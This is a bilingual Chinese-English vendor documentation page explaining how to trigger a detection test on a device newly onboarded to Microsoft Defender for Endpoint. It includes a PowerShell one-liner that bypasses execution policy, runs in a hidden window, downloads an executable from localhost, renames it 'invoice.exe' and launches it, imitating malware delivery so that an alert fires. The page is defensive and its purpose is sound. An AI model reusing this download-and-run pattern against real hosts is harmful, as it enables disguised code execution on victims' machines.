在新载入的 Microsoft Defender 终结点设备上运行检测测试Run a detection test on a newly onboarded Microsoft Defender for Endpoint device

适用于:Applies to:

想要体验 Microsoft Defender for Endpoint?Want to experience Microsoft Defender for Endpoint? 注册免费试用版。Sign up for a free trial.

在新载入的设备上运行以下 PowerShell 脚本,验证它是否正确报告给 Defender for Endpoint 服务。Run the following PowerShell script on a newly onboarded device to verify that it is properly reporting to the Defender for Endpoint service.

  1. 创建文件夹:"C:\test-MDATP-test"。Create a folder: 'C:\test-MDATP-test'.

  2. 在设备上打开提升的命令行提示符并运行脚本:Open an elevated command-line prompt on the device and run the script:

    1. 转到“开始”并键入“cmd”。Go to Start and type cmd.

    2. 右键单击命令 提示符 ,然后选择 以管理员角色运行Right-click Command Prompt and select Run as administrator.

      指向"以管理员模式运行"的"窗口开始"菜单

  3. 在提示符下,复制并运行以下命令:At the prompt, copy and run the following command:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

命令提示符窗口将自动关闭。The Command Prompt window will close automatically. 如果成功,检测测试将标记为已完成,并且大约 10 分钟后,已载入设备的门户中将显示新警报。If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded device in approximately 10 minutes.